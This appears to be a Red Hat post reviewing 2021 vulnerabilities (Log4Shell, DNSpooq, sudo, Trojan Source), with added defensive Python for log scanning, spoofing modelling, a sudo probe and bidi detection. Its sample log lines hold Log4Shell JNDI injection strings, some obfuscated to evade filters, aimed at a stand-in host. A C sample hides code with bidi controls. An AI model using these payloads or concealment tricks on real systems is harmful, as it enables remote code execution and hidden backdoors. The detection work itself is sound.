Red Hat strives to provide top customer value and support, including helping our customers manage risks associated with major vulnerabilities via Red Hat Security Bulletins. Some of the major vulnerabilities we addressed in 2021 include:
- Apache Log4Shell
- Sudo privilege escalation
- Trojan source attacks
Red Hat Security Bulletins contain the most current information on new vulnerabilities, diagnostic tools, and updates and fixes for new product releases. Customers can use this information to make risk-based decisions on their environment.
For a list of all major security incidents, visit the Security Bulletins page.
Red Hat Security Bulletin #1: Apache Log4Shell vulnerability
The Log4Shell (CVE-2021-44228) vulnerability shook the IT world at the end of 2021. This Critical flaw let an unauthenticated remote attacker execute arbitrary code on a vulnerable service simply by getting a crafted string into any value the application logged (a User-Agent header, a username, a form field), because affected versions of Log4J evaluated JNDI lookups embedded in log messages and loaded code from the server the lookup named.
The Log4Shell vulnerability was one of the most severe vulnerabilities in the history of information security. Its severity came from the combination of how widely the Log4J library is used and how simple the attack is.
Java is present in many digital systems, front ends, products, appliances, and services. When a Java program needs logging, Log4J is one of the most widely used solutions, so this vulnerability could affect most Java software that used it. The flaw affected all Log4J 2 releases prior to 2.15.0.
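Because the attack string only has to reach a logged value, scanning existing web and application logs for JNDI lookups was the first check most teams ran. The Python below is an added example written for this page (it is not Red Hat's or the Log4J project's code): it flags the `${jndi:` pattern in log lines after undoing URL encoding and the nested-lookup tricks (`${lower:..}`, `${upper:..}` and `${...:-x}` defaults) attackers used to evade naive greps. The log lines are constructed samples using TEST-NET addresses; the normaliser handles only those three lookup forms, so it is a triage aid, not a complete Log4J lookup evaluator.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "${", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What remains after normalisation if the string carried a JNDI lookup.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body: str) -> Optional[str]:
    """Collapse the Log4J lookup forms commonly used to hide 'jndi'.

    Returns the literal the lookup evaluates to, or None when the prefix is
    not one we can evaluate offline (jndi, date, ctx, ... are left in place).
    """
    if ":-" in body:                       # ${env:NOPE:-j} and ${::-j} -> "j"
        return body.rsplit(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J} -> "j"
        return arg.lower()
    if sep and prefix.lower() == "upper":  # ${upper:j} -> "J"
        return arg.upper()
    return None


def normalize_lookups(text: str) -> str:
    """Repeatedly evaluate innermost collapsible lookups until none remain."""
    pos = 0
    while True:
        m = INNERMOST.search(text, pos)
        if m is None:
            return text
        literal = resolve_lookup(m.group(1))
        if literal is None:                # not collapsible: keep it, move on
            pos = m.end()
            continue
        text = text[:m.start()] + literal + text[m.end():]
        pos = 0                            # an outer lookup may now be innermost


def find_jndi(line: str) -> Optional[str]:
    """Return the normalised line if it contains a JNDI lookup, else None."""
    candidate = normalize_lookups(unquote(line))
    return candidate if JNDI.search(candidate) else None


def scan_log(lines) -> list[int]:
    """1-based numbers of the lines carrying a (possibly obfuscated) JNDI lookup."""
    return [n for n, line in enumerate(lines, start=1) if find_jndi(line)]


# Constructed access-log lines (TEST-NET-2 addresses), not real traffic.
SAMPLE_LOG_LINES = [
    '198.51.100.23 - - [10/Dec/2021:21:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:21:14:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '198.51.100.23 - - [10/Dec/2021:21:14:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '198.51.100.23 - - [10/Dec/2021:21:14:06 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://198.51.100.7/z}"',
    '198.51.100.23 - - [10/Dec/2021:21:14:07 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fq%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.24 - - [10/Dec/2021:21:14:08 +0000] "GET /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.24 - - [10/Dec/2021:21:14:09 +0000] "GET /report?d=${date:yyyy-MM} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {find_jndi(SAMPLE_LOG_LINES[n - 1])}")
```

Only the first five constructed lines are reported; the `${date:...}` lookup on the last line is left untouched because it is not one of the collapsible forms and is not a JNDI lookup.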
While the initial Log4Shell was indeed a critical issue, seven further Log4J vulnerabilities were discovered after the initial CVE was reported. Some of these also affected Log4J version 1, which the Apache Software Foundation had stopped supporting in 2015.
Red Hat delivered Critical CVE updates for affected products within three business days. Red Hat also treated the seven subsequent vulnerabilities across multiple products and versions as part of the same major security incident, regardless of the severity assigned to each follow-on CVE, and provided patches for Log4J version 1 even though it is no longer supported upstream. All patches shipped by Red Hat are fully supported.
Red Hat Security Bulletin #2: DNSpooq
Dnsmasq, a lightweight DNS forwarder and DHCP server widely used in small networks and embedded in several virtualization and container stacks, was affected by seven security issues (CVE-2020-25681, CVE-2020-25682, CVE-2020-25683, CVE-2020-25684, CVE-2020-25685, CVE-2020-25686, CVE-2020-25687), branded collectively as DNSpooq.
Moshe Kol and Shlomi Oberman from JSOF discovered the vulnerabilities. Red Hat, CERT/CC, Cisco, Google, and the Pi-Hole incident response teams supported the disclosure coordination and the release of vulnerability information.
These vulnerabilities affected the following Red Hat products:
- Red Hat OpenStack® Platform 10
- Red Hat OpenStack Platform 13
- Red Hat Virtualization 4.3
- Red Hat Virtualization 4.4
- Red Hat OpenShift® Container Platform 3.11
- Red Hat Enterprise Linux® 7
- Red Hat Enterprise Linux 8
A remote attacker could execute code on the victim machine through two of the vulnerabilities, CVE-2020-25681 and CVE-2020-25682, both heap buffer overflows in the DNSSEC validation code and therefore reachable only when DNSSEC is enabled. CVE-2020-25684, CVE-2020-25685 and CVE-2020-25686 weakened the checks dnsmasq applied to incoming replies and made DNS cache poisoning by an off-path attacker practical, while the remaining two flaws allowed denial of service. Red Hat analyzed the attack surface and how the component is used in each affected product before rating the vulnerabilities. This gave customers precise information, including mitigations that could be applied in affected products to reduce or eliminate the risk introduced by these flaws.
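The three cache-poisoning flaws each removed some of the entropy a forged reply has to guess: dnsmasq did not check which local port (and upstream address) a reply was addressed to (CVE-2020-25684), it matched the query name with a weak CRC-32 hash (CVE-2020-25685), and it forwarded every duplicate query for the same name instead of coalescing them, giving the attacker more outstanding queries to hit (CVE-2020-25686). The Python below is an added example, not dnsmasq code: a toy forwarder whose reply-matching rule can be toggled between "transaction ID only" and "transaction ID plus destination port", and a blind spoofing loop that counts how many forged replies an off-path attacker needs. The `ToyForwarder` class, the ephemeral port range and the fixed seed are assumptions of this model; the name-hash weakness is not modelled.

```python
import random
from dataclasses import dataclass

TXID_SPACE = 1 << 16               # the DNS transaction ID is 16 bits
PORT_LOW, PORT_HIGH = 1024, 65536  # assumed ephemeral source-port range


@dataclass
class PendingQuery:
    txid: int
    sport: int    # local UDP port the query was sent from
    qname: str


class ToyForwarder:
    """Minimal model of a forwarding resolver: it remembers the queries it has
    forwarded upstream and accepts the first reply that matches one of them."""

    def __init__(self, rng: random.Random, check_source_port: bool) -> None:
        self.rng = rng
        self.check_source_port = check_source_port
        self.pending: dict[int, list[PendingQuery]] = {}
        self.cache: dict[str, str] = {}

    def forward(self, qname: str) -> PendingQuery:
        q = PendingQuery(self.rng.randrange(TXID_SPACE),
                         self.rng.randrange(PORT_LOW, PORT_HIGH), qname)
        self.pending.setdefault(q.txid, []).append(q)
        return q

    def receive(self, txid: int, dport: int, qname: str, rdata: str) -> bool:
        """A reply for `qname` with transaction ID `txid` arrived, addressed to
        local UDP port `dport`. Returns True if it was accepted into the cache."""
        for q in self.pending.get(txid, []):
            if q.qname != qname:
                continue
            if self.check_source_port and q.sport != dport:
                continue                   # the CVE-2020-25684 check
            self.cache[qname] = rdata
            self.pending[txid].remove(q)
            return True
        return False


def spoof_until_poisoned(check_source_port: bool, outstanding: int,
                         max_replies: int, seed: int = 1):
    """Attacker blindly fires replies with random txid and port. Returns how many
    were needed to poison the cache, or None if max_replies was not enough."""
    rng = random.Random(seed)
    fwd = ToyForwarder(rng, check_source_port)
    for _ in range(outstanding):           # CVE-2020-25686: duplicates all forwarded
        fwd.forward("victim.example")
    for n in range(1, max_replies + 1):
        if fwd.receive(rng.randrange(TXID_SPACE), rng.randrange(PORT_LOW, PORT_HIGH),
                       "victim.example", "198.51.100.7"):
            return n
    return None


def expected_spoofed_replies(check_source_port: bool, outstanding: int) -> float:
    """Mean forged replies until the first hit: the guessing space divided by
    the number of outstanding forwards a reply may match."""
    space = TXID_SPACE * ((PORT_HIGH - PORT_LOW) if check_source_port else 1)
    return space / outstanding


if __name__ == "__main__":
    for check in (False, True):
        print(f"check port={check}: expected {expected_spoofed_replies(check, 16):.0f} "
              f"replies, simulated {spoof_until_poisoned(check, 16, 65536)}")
```

With only the 16-bit transaction ID checked and sixteen identical queries outstanding, a few thousand forged replies are enough on average; checking the destination port as well pushes the expected count into the hundreds of millions, which is why the simulated run with the port check gives up within its budget. The `outstanding` parameter is what dnsmasq's `--dns-forward-max` option bounds, which is why lowering it was a useful interim mitigation before patched packages were available.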
Red Hat Security Bulletin #3: Sudo privilege escalation vulnerability
Another vulnerability that received a high level of attention in January 2021 was a heap-based buffer overflow in sudo (CVE-2021-3156, nicknamed "Baron Samedit") that had been present since July 2011.
The flaw lies in faulty handling of backslash escapes in command-line arguments when sudo is run in shell mode (reachable through sudoedit -s): the unescaping loop reads and writes past the end of the argument buffer, causing memory corruption that leads to a crash or, with a crafted argument list, escalation to root. An attacker needs local shell access to the system, but does not need to be listed in sudoers.
Because the sudo package is installed by default on all Red Hat Enterprise Linux systems and allows users to execute commands as other users, most commonly root, Red Hat Product Security classified this flaw as having a severity rating of Important. Red Hat provided a systemtap-based mitigation and quick updates for the potentially affected products within the Red Hat portfolio.
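The quickest way to tell whether a host's sudo is affected is the probe published with the advisory: run `sudoedit -s /` as an unprivileged user. A vulnerable build answers `sudoedit: /: not a regular file`, while a fixed build rejects the option combination with a `usage:` message. The Python below, an added example rather than Red Hat's tooling or the systemtap mitigation, wraps that probe so it can be run from an inventory script; the marker strings are taken from those two messages, and the five second timeout and closed stdin are assumptions so that the probe can never block on a prompt.

```python
import shutil
import subprocess

# Substrings of the two known outcomes of `sudoedit -s /` (case-insensitive).
VULNERABLE_MARKER = "not a regular file"   # sudoedit: /: not a regular file
PATCHED_MARKER = "usage:"                  # usage: sudoedit [-AknS] ... file ...


def classify_sudoedit_output(output: str) -> str:
    """Map the combined stdout/stderr of `sudoedit -s /` to a verdict."""
    text = output.lower()
    if VULNERABLE_MARKER in text:
        return "vulnerable"
    if PATCHED_MARKER in text:
        return "patched"
    return "unknown"


def check_local_sudo(timeout: float = 5.0) -> str:
    """Run the probe on this host as the current (unprivileged) user.

    stdin is closed so that a password prompt, should one appear, fails
    immediately instead of hanging; a timeout guards against anything else.
    """
    if shutil.which("sudoedit") is None:
        return "unknown"                   # no sudo installed, nothing to probe
    try:
        proc = subprocess.run(
            ["sudoedit", "-s", "/"],
            stdin=subprocess.DEVNULL,
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    except (OSError, subprocess.TimeoutExpired):
        return "unknown"
    return classify_sudoedit_output(proc.stdout + proc.stderr)


if __name__ == "__main__":
    print(check_local_sudo())
```

An `unknown` verdict (sudo absent, a non-standard build with different messages, or a timeout) should be followed up by checking the installed package version against the advisory rather than treated as safe.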
The sudo flaw potentially affected the following Red Hat product versions and containers:
- Red Hat Enterprise Linux 6
- Red Hat Enterprise Linux 7
- Red Hat Enterprise Linux 8
- Red Hat OpenShift Container Platform 4
- Red Hat Virtualization 4.3 and 4.4
- Red Hat OpenShift Container Storage 4
Red Hat Security Bulletin #4: Trojan source attacks
In late 2021, Red Hat published a Security Bulletin on the Trojan Source attacks, covering the bidirectional-override technique (CVE-2021-42574), often referred to simply as BiDi, and the related homoglyph technique (CVE-2021-42694). This issue introduced a new source code and supply chain attack scenario in which the behavior of the software and the expectations set by reading its source do not match: Unicode bidirectional control characters change how a line is displayed, so that text a human reviewer sees as a comment or string literal can in fact be live code for the compiler, and vice versa. The code reviewed by a human is therefore different from the software the compiler generates.
Red Hat led a large disclosure coordination effort between several Linux distributions, upstream projects, and standards working groups. We discussed the scope of the vulnerability, shared and worked on our scanning and detection script with them, and helped design patches for the issue.
Red Hat not only scanned our own codebase and internal infrastructure, but for the first time we also made our detection script available on GitHub for community collaboration. Other Linux distributors and several upstream projects used this detection script to scan their code and run it within their CI/CD pipelines. Red Hat also led efforts to add detection of these special characters to the GNU Compiler Collection (GCC) and coordinated with other language projects.
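The detection problem is mechanical: find the Unicode bidirectional control characters in source files and, in particular, lines on which an embedding, override or isolate is opened and never closed before the newline, which is how a comment or string terminator can be made to render in the wrong place. The Python scanner below is an added example and is not Red Hat's published detection script; the C snippet it scans is constructed for the example, and the `Finding` structure and the per-line "unterminated" heuristic are assumptions of this code rather than anything from the bulletin.

```python
import sys
import unicodedata
from dataclasses import dataclass

# Bidirectional control characters abused by Trojan Source (CVE-2021-42574).
EMBED_OPEN = {"\u202a", "\u202b", "\u202d", "\u202e"}   # LRE, RLE, LRO, RLO
EMBED_CLOSE = "\u202c"                                   # PDF
ISOLATE_OPEN = {"\u2066", "\u2067", "\u2068"}            # LRI, RLI, FSI
ISOLATE_CLOSE = "\u2069"                                 # PDI
BIDI_CONTROLS = EMBED_OPEN | ISOLATE_OPEN | {EMBED_CLOSE, ISOLATE_CLOSE}


@dataclass
class Finding:
    line: int        # 1-based line number
    column: int      # 1-based column, counted in code points
    codepoint: int
    name: str        # Unicode character name, e.g. RIGHT-TO-LEFT OVERRIDE


def scan_text(text: str) -> list[Finding]:
    """Report every bidi control character in `text` with its position."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append(Finding(lineno, col, ord(ch), unicodedata.name(ch)))
    return findings


def unterminated_lines(text: str) -> list[int]:
    """Lines where an embedding/override or an isolate is still open at the
    newline: the shape Trojan Source relies on to reorder the rest of a line."""
    bad = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        embeds = isolates = 0
        for ch in line:
            if ch in EMBED_OPEN:
                embeds += 1
            elif ch == EMBED_CLOSE:
                embeds = max(0, embeds - 1)
            elif ch in ISOLATE_OPEN:
                isolates += 1
            elif ch == ISOLATE_CLOSE:
                isolates = max(0, isolates - 1)
        if embeds or isolates:
            bad.append(lineno)
    return bad


def scan_file(path: str) -> list[Finding]:
    """Scan one file; undecodable bytes are replaced so the scan never aborts."""
    with open(path, "rb") as fh:
        return scan_text(fh.read().decode("utf-8", errors="replace"))


# Constructed sample: line 4 hides an RLO plus isolates inside a comment, the
# pattern used in the Trojan Source paper, so an editor may render the comment
# boundary somewhere other than where the compiler reads it.
SAMPLE_SOURCE = (
    "#include <stdio.h>\n"
    "int main(void) {\n"
    "    int is_admin = 0;\n"
    "    /*\u202e } \u2066if (is_admin)\u2069 \u2066 begin admins only */\n"
    "    printf(\"you are an admin\\n\");\n"
    "    return 0;\n"
    "}\n"
)

if __name__ == "__main__":
    paths = sys.argv[1:]
    results = [(p, scan_file(p)) for p in paths] if paths else [("<sample>", scan_text(SAMPLE_SOURCE))]
    for path, findings in results:
        for f in findings:
            print(f"{path}:{f.line}:{f.column}: U+{f.codepoint:04X} {f.name}")
```

Run it over a source tree (`python scanner.py $(git ls-files)`) and treat any hit in code as a review blocker; legitimate uses of these characters are essentially confined to string literals holding right-to-left text, which is rare enough that an allowlist of specific files is the right exception mechanism.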